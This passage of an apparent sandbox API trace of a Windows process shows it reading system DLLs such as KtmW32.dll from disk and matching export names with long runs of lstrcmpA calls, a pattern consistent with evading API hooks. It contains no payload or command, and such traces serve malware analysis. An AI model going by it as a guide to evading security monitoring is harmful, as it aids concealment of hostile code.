(HeapHandle=0x450000, Flags=0x0, Size=0x1555b8) returned 0x410e040 [0169.177] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0169.177] ReadFile (in: hFile=0x17c, lpBuffer=0x410e040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x410e040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0169.396] CloseHandle (hObject=0x17c) returned 1 [0169.396] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0169.397] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0169.397] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0169.397] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0169.397] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0169.397] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0169.397] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0169.397] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0169.397] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0169.397] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0169.397] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0169.397] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0169.397] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0169.397] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0169.397] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0169.397] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0169.397] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0169.397] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0169.397] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0169.397] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0169.397] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0169.397] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0169.397] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0169.397] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0169.397] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0169.398] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0169.398] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0169.398] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0169.398] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0169.398] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0169.398] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0169.398] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0169.398] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0169.398] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0169.398] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0169.398] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0169.398] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0169.398] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0169.398] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0169.398] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0169.398] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0169.398] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0169.398] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0169.398] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0169.398] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0169.398] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0169.398] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0169.398] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0169.398] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0169.398] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0169.398] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0169.399] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0169.399] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0169.399] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0169.399] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0169.399] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0169.399] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0169.399] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0169.399] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0169.399] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0169.400] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0169.400] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0169.400] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0169.400] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0169.400] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0169.400] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0169.401] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0169.401] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0169.401] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0169.401] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0169.402] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0169.402] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0169.402] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0169.402] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0169.402] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0169.402] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0169.402] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0169.403] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0169.404] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0169.405] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0170.212] GetProcessHeap () returned 0x450000 [0170.213] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x410e040 | out: hHeap=0x450000) returned 1 [0170.219] GetProcessHeap () returned 0x450000 [0170.219] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469180 [0170.219] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0170.223] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0170.223] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0170.223] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0170.223] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0170.224] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0170.224] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0170.224] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0170.224] GetProcessHeap () returned 0x450000 [0170.224] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5e00) returned 0x2d45030 [0170.224] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0170.224] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0170.225] CloseHandle (hObject=0x17c) returned 1 [0170.225] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0170.225] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0170.225] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0170.225] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0170.225] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0170.225] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0170.225] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0170.225] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0170.225] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0170.225] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0170.225] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0170.225] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0170.225] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0170.225] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0170.225] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0170.225] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0170.225] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0170.225] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0170.225] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0170.225] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0170.225] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0170.225] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0170.226] lstrcmpA (lpString1="CreateTransaction", 